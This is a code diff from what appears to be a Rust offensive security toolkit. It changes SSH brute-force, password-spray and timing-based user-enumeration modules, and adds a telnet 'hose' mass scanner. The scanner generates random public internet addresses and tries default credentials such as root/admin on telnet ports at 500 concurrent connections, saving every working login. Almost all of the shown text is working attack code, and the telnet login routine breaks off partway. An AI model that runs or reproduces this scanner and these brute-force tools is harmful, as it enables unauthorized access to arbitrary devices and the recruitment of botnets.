net::TcpStream,
sync::atomic::{AtomicBool, Ordering},
sync::Arc,
time::Duration,
io::Write,
};
use regex::Regex;
use tokio::{
io::{AsyncBufReadExt, AsyncWriteExt},
sync::{Mutex, Semaphore},
task::spawn_blocking,
time::{sleep, Duration, timeout},
time::{sleep, timeout},
};
use futures::stream::{FuturesUnordered, StreamExt};
use crate::utils::{
normalize_target, prompt_default, prompt_yes_no,
prompt_existing_file, load_lines, get_filename_in_current_dir
};
use crate::modules::creds::utils::BruteforceStats;
// Constants
const DEFAULT_SSH_PORT: u16 = 22;
@@ -40,93 +40,13 @@ const DEFAULT_CREDENTIALS: &[(&str, &str)] = &[
("oracle", "oracle"),
];
// Statistics tracking
struct Statistics {
total_attempts: AtomicU64,
successful_attempts: AtomicU64,
failed_attempts: AtomicU64,
error_attempts: AtomicU64,
retried_attempts: AtomicU64,
start_time: Instant,
}
impl Statistics {
fn new() -> Self {
Self {
total_attempts: AtomicU64::new(0),
successful_attempts: AtomicU64::new(0),
failed_attempts: AtomicU64::new(0),
error_attempts: AtomicU64::new(0),
retried_attempts: AtomicU64::new(0),
start_time: Instant::now(),
}
}
fn record_attempt(&self, success: bool, error: bool) {
self.total_attempts.fetch_add(1, Ordering::Relaxed);
if error {
self.error_attempts.fetch_add(1, Ordering::Relaxed);
} else if success {
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
} else {
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
}
}
fn record_retry(&self) {
self.retried_attempts.fetch_add(1, Ordering::Relaxed);
}
fn print_progress(&self) {
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let retries = self.retried_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
print!(
"\r{} {} attempts | {} OK | {} fail | {} err | {} retry | {:.1}/s ",
"[Progress]".cyan(),
total.to_string().bold(),
success.to_string().green(),
failed,
errors.to_string().red(),
retries,
rate
);
let _ = std::io::Write::flush(&mut std::io::stdout());
}
fn print_final(&self) {
println!();
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let retries = self.retried_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
println!("{}", "=== Statistics ===".bold());
println!(" Total attempts: {}", total);
println!(" Successful: {}", success.to_string().green().bold());
println!(" Failed: {}", failed);
println!(" Errors: {}", errors.to_string().red());
println!(" Retries: {}", retries);
println!(" Elapsed time: {:.2}s", elapsed);
if elapsed > 0.0 {
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
}
}
}
pub async fn run(target: &str) -> Result<()> {
println!("{}", "=== SSH Brute Force Module ===".bold());
println!("[*] Target: {}", target);
let port: u16 = loop {
let input = prompt_default("SSH Port", &DEFAULT_SSH_PORT.to_string()).await?;
let input = prompt_default("SSH Port", &DEFAULT_SSH_PORT.to_string())?;
match input.parse() {
Ok(p) if p > 0 => break p,
_ => println!("{}", "Invalid port. Must be between 1 and 65535.".yellow()),
@@ -134,16 +54,16 @@ pub async fn run(target: &str) -> Result<()> {
};
// Ask about default credentials
let use_defaults = prompt_yes_no("Try default credentials first?", true).await?;
let use_defaults = prompt_yes_no("Try default credentials first?", true)?;
let usernames_file = if prompt_yes_no("Use username wordlist?", true).await? {
Some(prompt_existing_file("Username wordlist").await?)
let usernames_file = if prompt_yes_no("Use username wordlist?", true)? {
Some(prompt_existing_file("Username wordlist")?)
} else {
None
};
let passwords_file = if prompt_yes_no("Use password wordlist?", true).await? {
Some(prompt_existing_file("Password wordlist").await?)
let passwords_file = if prompt_yes_no("Use password wordlist?", true)? {
Some(prompt_existing_file("Password wordlist")?)
} else {
None
};
@@ -153,7 +73,7 @@ pub async fn run(target: &str) -> Result<()> {
}
let concurrency: usize = loop {
let input = prompt_default("Max concurrent tasks", "10").await?;
let input = prompt_default("Max concurrent tasks", "10")?;
match input.parse() {
Ok(n) if n > 0 && n <= 256 => break n,
_ => println!("{}", "Invalid number. Must be between 1 and 256.".yellow()),
@@ -161,17 +81,17 @@ pub async fn run(target: &str) -> Result<()> {
};
let connection_timeout: u64 = loop {
let input = prompt_default("Connection timeout (seconds)", "5").await?;
let input = prompt_default("Connection timeout (seconds)", "5")?;
match input.parse() {
Ok(n) if n >= 1 && n <= 60 => break n,
_ => println!("{}", "Invalid timeout. Must be between 1 and 60 seconds.".yellow()),
}
};
let retry_on_error = prompt_yes_no("Retry on connection errors?", true).await?;
let retry_on_error = prompt_yes_no("Retry on connection errors?", true)?;
let max_retries: usize = if retry_on_error {
loop {
let input = prompt_default("Max retries per attempt", "2").await?;
let input = prompt_default("Max retries per attempt", "2")?;
match input.parse() {
Ok(n) if n > 0 && n <= 10 => break n,
_ => println!("{}", "Invalid retries. Must be between 1 and 10.".yellow()),
@@ -181,17 +101,17 @@ pub async fn run(target: &str) -> Result<()> {
0
};
let stop_on_success = prompt_yes_no("Stop on first success?", true).await?;
let save_results = prompt_yes_no("Save results to file?", true).await?;
let stop_on_success = prompt_yes_no("Stop on first success?", true)?;
let save_results = prompt_yes_no("Save results to file?", true)?;
let save_path = if save_results {
Some(prompt_default("Output file", "ssh_brute_results.txt").await?)
Some(prompt_default("Output file", "ssh_brute_results.txt")?)
} else {
None
};
let verbose = prompt_yes_no("Verbose mode?", false).await?;
let combo_mode = prompt_yes_no("Combination mode? (try every pass with every user)", false).await?;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let combo_mode = prompt_yes_no("Combination mode? (try every pass with every user)", false)?;
let connect_addr = normalize_target(target, port)?;
let connect_addr = normalize_target(&format!("{}:{}", target, port)).unwrap_or_else(|_| format!("{}:{}", target, port));
println!("\n{}", format!("[*] Starting brute-force on {}", connect_addr).cyan());
@@ -245,10 +165,10 @@ pub async fn run(target: &str) -> Result<()> {
println!("{}", format!("[*] Total attempts: {}", total_attempts).cyan());
println!();
let found = Arc::new(Mutex::new(HashSet::new()));
let found = Arc::new(Mutex::new(Vec::new()));
let unknown = Arc::new(Mutex::new(Vec::<(String, String, String, String)>::new()));
let stop = Arc::new(AtomicBool::new(false));
let stats = Arc::new(Statistics::new());
let stats = Arc::new(BruteforceStats::new());
let semaphore = Arc::new(Semaphore::new(concurrency));
let timeout_duration = Duration::from_secs(connection_timeout);
@@ -265,8 +185,7 @@ pub async fn run(target: &str) -> Result<()> {
}
});
// Generate credential pairs
let mut tasks = Vec::new();
let mut tasks = FuturesUnordered::new();
let mut user_cycle_idx = 0usize;
for pass in passwords.iter() {
@@ -305,7 +224,6 @@ pub async fn run(target: &str) -> Result<()> {
let retry_flag = retry_on_error;
let max_retries_clone = max_retries;
// Spawn task immediately - acquire permit INSIDE the task for true concurrency
tasks.push(tokio::spawn(async move {
if stop_flag && stop_clone.load(Ordering::Relaxed) {
return;
@@ -327,7 +245,11 @@ pub async fn run(target: &str) -> Result<()> {
Ok(true) => {
println!("\r{}", format!("[+] {} -> {}:{}", addr_clone, user_clone, pass_clone).green());
let mut found_guard = found_clone.lock().await;
found_guard.insert((addr_clone.clone(), user_clone.clone(), pass_clone.clone()));
// Check if already found to avoid duplicates
let entry = (addr_clone.clone(), user_clone.clone(), pass_clone.clone());
if !found_guard.contains(&entry) {
found_guard.push(entry);
}
stats_clone.record_attempt(true, false);
if stop_flag {
stop_clone.store(true, Ordering::Relaxed);
@@ -393,15 +315,19 @@ pub async fn run(target: &str) -> Result<()> {
}
}
// Wait for all tasks with bounded concurrency
while let Some(result) = tasks.pop() {
let _ = result.await;
// Wait for all tasks with FuturesUnordered
while let Some(res) = tasks.next().await {
if let Err(e) = res {
if verbose {
println!("\r{}", format!("[!] Task error: {}", e).red());
}
}
}
stop.store(true, Ordering::Relaxed);
let _ = progress_handle.await;
stats.print_final();
stats.print_final().await;
let creds = found.lock().await;
if creds.is_empty() {
@@ -414,6 +340,8 @@ pub async fn run(target: &str) -> Result<()> {
if let Some(path_str) = save_path {
let filename = get_filename_in_current_dir(&path_str);
// Use std::fs::File for simple writing
use std::fs::File;
let mut file = File::create(&filename)?;
for (host, user, pass) in creds.iter() {
writeln!(file, "{} -> {}:{}", host, user, pass)?;
@@ -437,7 +365,7 @@ pub async fn run(target: &str) -> Result<()> {
.yellow()
.bold()
);
if prompt_yes_no("Save unknown responses to file?", true).await? {
if prompt_yes_no("Save unknown responses to file?", true)? {
let default_name = "ssh_unknown_responses.txt";
let fname = prompt_default(
&format!(
@@ -445,8 +373,9 @@ pub async fn run(target: &str) -> Result<()> {
default_name
),
default_name,
).await?;
)?;
let filename = get_filename_in_current_dir(&fname);
use std::fs::File;
match File::create(&filename) {
Ok(mut file) => {
writeln!(
@@ -490,9 +419,7 @@ async fn try_ssh_login(
let pass_owned = pass.to_string();
let addr_owned = normalized_addr.to_string();
let result = timeout(
timeout_duration,
spawn_blocking(move || {
let handle = spawn_blocking(move || {
let tcp = TcpStream::connect(&addr_owned)
.map_err(|e| anyhow!("Connection error: {}", e))?;
@@ -507,141 +434,11 @@ async fn try_ssh_login(
.map_err(|e| anyhow!("Authentication failed: {}", e))?;
Ok(sess.authenticated())
}),
)
.await
.map_err(|_| anyhow!("Connection timeout"))??;
});
result
}
fn normalize_target(host: &str, default_port: u16) -> Result<String> {
let re = Regex::new(r"^\[*(?P<addr>[^\]]+?)\]*(?::(?P<port>\d{1,5}))?$").unwrap();
let trimmed = host.trim();
let caps = re
.captures(trimmed)
.ok_or_else(|| anyhow!("Invalid target format: {}", host))?;
let addr = caps.name("addr").unwrap().as_str();
let port = if let Some(m) = caps.name("port") {
m.as_str()
.parse::<u16>()
.map_err(|_| anyhow!("Invalid port value in target '{}'", host))?
} else {
default_port
};
let formatted = if addr.contains(':') && !addr.contains('.') {
format!("[{}]:{}", addr, port)
} else {
format!("{}:{}", addr, port)
};
formatted
.to_socket_addrs()
.map_err(|e| anyhow!("Could not resolve '{}': {}", formatted, e))?
.next()
.ok_or_else(|| anyhow!("Could not resolve '{}'", formatted))?;
Ok(formatted)
}
async fn prompt_existing_file(msg: &str) -> Result<String> {
loop {
let candidate = prompt_required(msg).await?;
if Path::new(&candidate).is_file() {
return Ok(candidate);
} else {
println!(
"{}",
format!("File '{}' does not exist or is not a regular file.", candidate).yellow()
);
}
}
}
async fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
} else {
println!("{}", "This field is required.".yellow());
}
}
}
async fn prompt_default(msg: &str, default: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default).cyan().bold());
tokio::io::stdout()
.flush()
let join_result = timeout(timeout_duration, handle)
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
Ok(if trimmed.is_empty() {
default.to_string()
} else {
trimmed.to_string()
})
}
.map_err(|_| anyhow!("Connection timeout"))?;
async fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let default_char = if default_yes { "y" } else { "n" };
loop {
print!("{}", format!("{} (y/n) [{}]: ", msg, default_char).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let input = s.trim().to_lowercase();
if input.is_empty() {
return Ok(default_yes);
} else if input == "y" || input == "yes" {
return Ok(true);
} else if input == "n" || input == "no" {
return Ok(false);
} else {
println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow());
}
}
}
fn load_lines<P: AsRef<Path>>(path: P) -> Result<Vec<String>> {
let file = File::open(path.as_ref())
.map_err(|e| anyhow!("Failed to open file '{}': {}", path.as_ref().display(), e))?;
let reader = BufReader::new(file);
Ok(reader
.lines()
.filter_map(Result::ok)
.filter(|l| !l.trim().is_empty())
.collect())
}
fn get_filename_in_current_dir(input_path_str: &str) -> PathBuf {
let path_candidate = Path::new(input_path_str)
.file_name()
.map(|os_str| os_str.to_string_lossy())
.filter(|s_cow| !s_cow.is_empty() && s_cow != "." && s_cow != "..")
.map(|s_cow| s_cow.into_owned())
.unwrap_or_else(|| "ssh_brute_results.txt".to_string());
PathBuf::from(format!("./{}", path_candidate))
join_result.map_err(|e| anyhow!("Join error: {}", e))?
}
+20 -25
View File
@@ -19,7 +19,7 @@ use std::{
},
time::{Duration, Instant},
};
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use anyhow::Context;
use tokio::{
sync::Semaphore,
@@ -246,8 +246,8 @@ pub async fn password_spray(
let user = user.clone();
let password = password.to_string();
let handle = tokio::spawn(async move {
let _permit = semaphore.acquire().await.unwrap();
let handle: tokio::task::JoinHandle<Result<()>> = tokio::spawn(async move {
let _permit = semaphore.acquire().await.context("Semaphore acquisition failed")?;
let host_clone = host.clone();
let user_clone = user.clone();
@@ -277,6 +277,7 @@ pub async fn password_spray(
stats.record_attempt(false, true);
}
}
Ok(())
});
handles.push(handle);
@@ -319,28 +320,24 @@ fn save_results(results: &[SprayResult], path: &str) -> Result<()> {
/// Prompt helper
async fn prompt(message: &str) -> Result<String> {
print!("{}: ", message);
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read input")?;
Ok(input.trim().to_string())
}
async fn prompt_default(message: &str, default: &str) -> Result<String> {
fn prompt_default(message: &str, default: &str) -> Result<String> {
print!("{} [{}]: ", message, default);
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read input")?;
let trimmed = input.trim();
if trimmed.is_empty() {
@@ -350,17 +347,15 @@ async fn prompt_default(message: &str, default: &str) -> Result<String> {
}
}
async fn prompt_yes_no(message: &str, default: bool) -> Result<bool> {
fn prompt_yes_no(message: &str, default: bool) -> Result<bool> {
let hint = if default { "Y/n" } else { "y/N" };
print!("{} [{}]: ", message, hint);
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read input")?;
let trimmed = input.trim().to_lowercase();
match trimmed.as_str() {
@@ -388,7 +383,7 @@ pub async fn run(target: &str) -> Result<()> {
}
// Get port
let port: u16 = prompt_default("SSH Port", "22").await?.parse().unwrap_or(DEFAULT_SSH_PORT);
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(DEFAULT_SSH_PORT);
// Get targets
let mut targets = Vec::new();
@@ -407,7 +402,7 @@ pub async fn run(target: &str) -> Result<()> {
}
// Load from file?
if prompt_yes_no("Load targets from file?", false).await? {
if prompt_yes_no("Load targets from file?", false)? {
let file_path = prompt("File path").await?;
if !file_path.is_empty() {
match load_list_from_file(&file_path) {
@@ -437,7 +432,7 @@ pub async fn run(target: &str) -> Result<()> {
// Get usernames
let mut usernames: Vec<String> = Vec::new();
if prompt_yes_no("Load usernames from file?", false).await? {
if prompt_yes_no("Load usernames from file?", false)? {
let file_path = prompt("Username file path").await?;
if !file_path.is_empty() {
match load_list_from_file(&file_path) {
@@ -453,7 +448,7 @@ pub async fn run(target: &str) -> Result<()> {
}
// Add default usernames?
if usernames.is_empty() || prompt_yes_no("Also test default usernames?", true).await? {
if usernames.is_empty() || prompt_yes_no("Also test default usernames?", true)? {
for user in DEFAULT_USERNAMES {
if !usernames.contains(&user.to_string()) {
usernames.push(user.to_string());
@@ -466,10 +461,10 @@ pub async fn run(target: &str) -> Result<()> {
}
// Get scan options
let threads: usize = prompt_default("Concurrent threads", &DEFAULT_THREADS.to_string()).await?
let threads: usize = prompt_default("Concurrent threads", &DEFAULT_THREADS.to_string())?
.parse()
.unwrap_or(DEFAULT_THREADS);
let timeout: u64 = prompt_default("Connection timeout (seconds)", &DEFAULT_TIMEOUT_SECS.to_string()).await?
let timeout: u64 = prompt_default("Connection timeout (seconds)", &DEFAULT_TIMEOUT_SECS.to_string())?
.parse()
.unwrap_or(DEFAULT_TIMEOUT_SECS);
@@ -479,8 +474,8 @@ pub async fn run(target: &str) -> Result<()> {
let results = password_spray(targets, &usernames, &password, threads, timeout).await;
// Save results?
if !results.is_empty() && prompt_yes_no("Save results to file?", true).await? {
let output_path = prompt_default("Output file", "ssh_spray_results.txt").await?;
if !results.is_empty() && prompt_yes_no("Save results to file?", true)? {
let output_path = prompt_default("Output file", "ssh_spray_results.txt")?;
if let Err(e) = save_results(&results, &output_path) {
println!("{}", format!("[-] Failed to save: {}", e).red());
}
+19 -25
View File
@@ -14,7 +14,7 @@ use std::{
net::TcpStream,
time::{Duration, Instant},
};
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use anyhow::Context;
const DEFAULT_SSH_PORT: u16 = 22;
@@ -183,30 +183,26 @@ pub async fn enumerate_users(
}
/// Prompt helper
async fn prompt(message: &str) -> Result<String> {
fn prompt(message: &str) -> Result<String> {
print!("{}: ", message);
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read input")?;
Ok(input.trim().to_string())
}
async fn prompt_default(message: &str, default: &str) -> Result<String> {
fn prompt_default(message: &str, default: &str) -> Result<String> {
print!("{} [{}]: ", message, default);
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read input")?;
let trimmed = input.trim();
if trimmed.is_empty() {
@@ -216,17 +212,15 @@ async fn prompt_default(message: &str, default: &str) -> Result<String> {
}
}
async fn prompt_yes_no(message: &str, default: bool) -> Result<bool> {
fn prompt_yes_no(message: &str, default: bool) -> Result<bool> {
let hint = if default { "Y/n" } else { "y/N" };
print!("{} [{}]: ", message, hint);
tokio::io::stdout()
std::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut input = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
std::io::stdin()
.read_line(&mut input)
.await
.context("Failed to read input")?;
let trimmed = input.trim().to_lowercase();
match trimmed.as_str() {
@@ -253,16 +247,16 @@ pub async fn run(target: &str) -> Result<()> {
println!("{}", format!("[*] Target: {}", host).cyan());
// Get parameters
let port: u16 = prompt_default("SSH Port", "22").await?.parse().unwrap_or(DEFAULT_SSH_PORT);
let samples: usize = prompt_default("Samples per username", "3").await?.parse().unwrap_or(DEFAULT_SAMPLES);
let timeout: u64 = prompt_default("Connection timeout (seconds)", "10").await?.parse().unwrap_or(DEFAULT_TIMEOUT_SECS);
let threshold: f64 = prompt_default("Timing threshold (seconds)", "0.3").await?.parse().unwrap_or(TIMING_THRESHOLD);
let port: u16 = prompt_default("SSH Port", "22")?.parse().unwrap_or(DEFAULT_SSH_PORT);
let samples: usize = prompt_default("Samples per username", "3")?.parse().unwrap_or(DEFAULT_SAMPLES);
let timeout: u64 = prompt_default("Connection timeout (seconds)", "10")?.parse().unwrap_or(DEFAULT_TIMEOUT_SECS);
let threshold: f64 = prompt_default("Timing threshold (seconds)", "0.3")?.parse().unwrap_or(TIMING_THRESHOLD);
// Get usernames
let mut usernames: Vec<String> = Vec::new();
if prompt_yes_no("Load usernames from file?", false).await? {
let file_path = prompt("Username file path").await?;
if prompt_yes_no("Load usernames from file?", false)? {
let file_path = prompt("Username file path")?;
if !file_path.is_empty() {
match load_usernames(&file_path) {
Ok(loaded) => {
@@ -277,7 +271,7 @@ pub async fn run(target: &str) -> Result<()> {
}
// Add default usernames?
if usernames.is_empty() || prompt_yes_no("Also test default usernames?", true).await? {
if usernames.is_empty() || prompt_yes_no("Also test default usernames?", true)? {
for user in DEFAULT_USERNAMES {
if !usernames.contains(&user.to_string()) {
usernames.push(user.to_string());
@@ -297,8 +291,8 @@ pub async fn run(target: &str) -> Result<()> {
let valid_users = enumerate_users(&host, port, &usernames, samples, timeout, threshold).await;
// Save results?
if !valid_users.is_empty() && prompt_yes_no("Save valid users to file?", true).await? {
let output_path = prompt_default("Output file", "valid_ssh_users.txt").await?;
if !valid_users.is_empty() && prompt_yes_no("Save valid users to file?", true)? {
let output_path = prompt_default("Output file", "valid_ssh_users.txt")?;
let mut file = File::create(&output_path)?;
writeln!(file, "# Valid SSH users for {}:{}", host, port)?;
for user in &valid_users {
File diff suppressed because it is too large Load Diff
+425
View File
@@ -0,0 +1,425 @@
use anyhow::{Result, Context};
use colored::*;
use rand::Rng;
use std::net::{IpAddr, Ipv4Addr, SocketAddr};
use std::sync::Arc;
use std::time::{Duration, Instant};
use tokio::fs::OpenOptions;
use tokio::io::{AsyncReadExt, AsyncWriteExt, BufReader};
use tokio::net::TcpStream;
use tokio::process::Command;
use tokio::sync::Semaphore;
use std::sync::atomic::{AtomicUsize, Ordering};
use tokio::time::timeout;
// Hardcoded exclusions (Private + Cloudflare + Google + Link Local etc)
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", // Private
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8", // Multicast/Reserved
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32", // Carrier/LinkLocal/Broadcast
// Cloudflare
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32",
// Google
"8.8.8.8/32", "8.8.4.4/32"
];
// Top 3 Telnet Ports
const TELNET_PORTS: &[u16] = &[23, 2323, 8023];
// Default Credentials (Mixed Cartesian Product will be generated from these)
const TOP_USERS: &[&str] = &["root", "admin", "user", "support", "guest"];
const TOP_PASS: &[&str] = &["root", "admin", "user", "1234", "123456", "password", "password123", "default", "support", "guest", ""];
// Keywords to match in help output (must match at least 2)
const HELP_KEYWORDS: &[&str] = &[
"show", "user", "system", "help", "exit", "quit", "logout", "enable", "config", "command", "menu", "admin"
];
// Internal Logic Constants
const CONCURRENCY: usize = 500;
const CONNECT_TIMEOUT_MS: u64 = 2000;
const LOGIN_TIMEOUT_MS: u64 = 6000; // Total time for a login attempt
const OUTPUT_FILE: &str = "telnet_hose_results.txt";
const STATE_FILE: &str = "telnet_hose_state.log"; // Stores "checked: <ip>"
#[derive(Debug, PartialEq, Clone, Copy)]
enum TelnetState {
WaitingForBanner,
SendingUsername,
WaitingForPasswordPrompt,
SendingPassword,
WaitingForResult,
SendingHelp,
WaitingForHelpResponse,
}
pub async fn run(target: &str) -> Result<()> {
println!("{}", "=== Telnet Hose Mass Scanner ===".bold().cyan());
println!("Target Mode: {}", if target.is_empty() || target == "random" { "Internet Random" } else { target });
println!("Concurrency: {}", CONCURRENCY);
println!("Exclusions: Enabled (Private + Cloudflare + Google)");
println!("Output: {}", OUTPUT_FILE);
// Parse exclusions
let mut exclusion_subnets = Vec::new();
for cidr in EXCLUDED_RANGES {
if let Ok(net) = cidr.parse::<ipnetwork::IpNetwork>() {
exclusion_subnets.push(net);
}
}
let exclusions = Arc::new(exclusion_subnets);
// Prepare Credential Combos
let mut creds = Vec::new();
for u in TOP_USERS {
for p in TOP_PASS {
creds.push((u.to_string(), p.to_string()));
}
}
// Also add reverse (pass as user) just in case for some
creds.push(("1234".to_string(), "1234".to_string()));
let creds = Arc::new(creds);
let semaphore = Arc::new(Semaphore::new(CONCURRENCY));
let stats_checked = Arc::new(AtomicUsize::new(0));
let stats_found = Arc::new(AtomicUsize::new(0));
// Spawn stats reporter
let s_checked = stats_checked.clone();
let s_found = stats_found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(5)).await;
println!(
"[*] Status: {} IPs checked, {} Creds found",
s_checked.load(Ordering::Relaxed),
s_found.load(Ordering::Relaxed).to_string().green().bold()
);
}
});
if target.is_empty() || target == "random" || target == "0.0.0.0/0" {
// Random Mode
loop {
let permit = semaphore.clone().acquire_owned().await.context("Semaphore acquisition failed")?;
let exc = exclusions.clone();
let cr = creds.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
// Check if already tested
if !is_ip_checked(&ip).await {
mark_ip_checked(&ip).await;
scan_ip(Some(ip), cr, sf).await;
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
} else {
// File/List Mode
// We assume 'target' is a file path since it's a "hose" module
let content = tokio::fs::read_to_string(target).await.unwrap_or_default();
let lines: Vec<String> = content.lines().map(|s| s.trim().to_string()).filter(|s| !s.is_empty()).collect();
if lines.is_empty() {
println!("No targets found in file or invalid target string.");
return Ok(());
}
println!("Loaded {} IPs from list", lines.len());
for ip_str in lines {
let permit = semaphore.clone().acquire_owned().await.context("Semaphore acquisition failed")?;
let cr = creds.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let ip = ip_str.clone();
tokio::spawn(async move {
if !is_ip_checked(&ip).await {
mark_ip_checked(&ip).await;
scan_ip(ip.parse().ok(), cr, sf).await;
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
// Wait for all tasks to finish (simple hack: try to acquire all semaphores)
// In a real hose, we just run until done.
for _ in 0..CONCURRENCY {
let _ = semaphore.acquire().await.context("Semaphore acquisition failed")?;
}
}
Ok(())
}
fn generate_random_public_ip(exclusions: &[ipnetwork::IpNetwork]) -> IpAddr {
let mut rng = rand::rng();
loop {
let octets: [u8; 4] = rng.random();
let ip = Ipv4Addr::from(octets);
let ip_addr = IpAddr::V4(ip);
let mut excluded = false;
for net in exclusions {
if net.contains(ip_addr) {
excluded = true;
break;
}
}
if !excluded {
return ip_addr;
}
}
}
async fn is_ip_checked(ip: &impl ToString) -> bool {
// Grep for "checked: <ip>" in state file
let ip_s = ip.to_string();
let status = Command::new("grep")
.arg("-F")
.arg("-q")
.arg(format!("checked: {}", ip_s))
.arg(STATE_FILE)
.status()
.await;
match status {
Ok(s) => s.success(), // Grep returns 0 (true) if found
Err(_) => false, // File might not exist yet
}
}
async fn mark_ip_checked(ip: &impl ToString) {
let data = format!("checked: {}\n", ip.to_string());
if let Ok(mut file) = OpenOptions::new()
.create(true)
.append(true)
.open(STATE_FILE)
.await
{
let _ = file.write_all(data.as_bytes()).await;
}
}
async fn save_result(ip: &str, port: u16, user: &str, pass: &str) {
let data = format!("{}:{} {}:{}\n", ip, port, user, pass);
println!("{} {}", "[+] HOSE SUCCESS:".green().bold(), data.trim());
if let Ok(mut file) = OpenOptions::new()
.create(true)
.append(true)
.open(OUTPUT_FILE)
.await
{
let _ = file.write_all(data.as_bytes()).await;
}
}
async fn scan_ip(
ip_opt: Option<IpAddr>,
creds: Arc<Vec<(String, String)>>,
stats_found: Arc<AtomicUsize>
) {
let Some(ip) = ip_opt else { return };
let ip_str = ip.to_string();
let mut handles = Vec::new();
for &port in TELNET_PORTS {
let socket_addr = SocketAddr::new(ip, port);
let creds = creds.clone();
let stats_found = stats_found.clone();
let ip_str = ip_str.clone();
handles.push(tokio::spawn(async move {
// Quick Connect Check
if timeout(Duration::from_millis(CONNECT_TIMEOUT_MS), TcpStream::connect(&socket_addr)).await.is_err() {
return;
}
// Port is open, try credentials
for (user, pass) in creds.iter() {
match try_telnet_login_hose(&socket_addr, user, pass).await {
Ok(true) => {
save_result(&ip_str, port, user, pass).await;
stats_found.fetch_add(1, Ordering::Relaxed);
return; // Stop after first success on this port
}
_ => {}
}
}
}));
}
// Wait for all ports to finish checking
for h in handles {
let _ = h.await;
}
}
// Simplified & Optimized Telnet Login for Hose
// Wrapper for retry logic
async fn try_telnet_login_hose(
socket: &SocketAddr,
username: &str,
password: &str,
) -> Result<bool> {
// Attempt 1: Standard (try to detect, fallback to User+Pass)
let (success, banner_seen) = do_telnet_session(socket, username, password, false).await?;
if success {
return Ok(true);
}
// If we failed AND never saw a proper banner (blind/silence), retry with Password Only
if !banner_seen {
// Attempt 2: Blind Password Only
let (success_retry, _) = do_telnet_session(socket, username, password, true).await?;
if success_retry {
return Ok(true);
}
}
Ok(false)
}
// Inner session logic
async fn do_telnet_session(
socket: &SocketAddr,
username: &str,
password: &str,
force_password_only: bool,
) -> Result<(bool, bool)> { // returns (success, banner_detected)
let stream_res = timeout(
Duration::from_millis(CONNECT_TIMEOUT_MS),
TcpStream::connect(socket)
).await;
let stream = match stream_res {
Ok(Ok(s)) => s,
_ => return Ok((false, false)), // Connect fail
};
let (reader, mut writer) = tokio::io::split(stream);
let mut reader = BufReader::new(reader);
let mut buf = [0u8; 1024];
// State Machine
let mut state = TelnetState::WaitingForBanner;
let start = Instant::now();
let max_duration = Duration::from_millis(LOGIN_TIMEOUT_MS);
let mut banner_detected = false;
while start.elapsed() < max_duration {
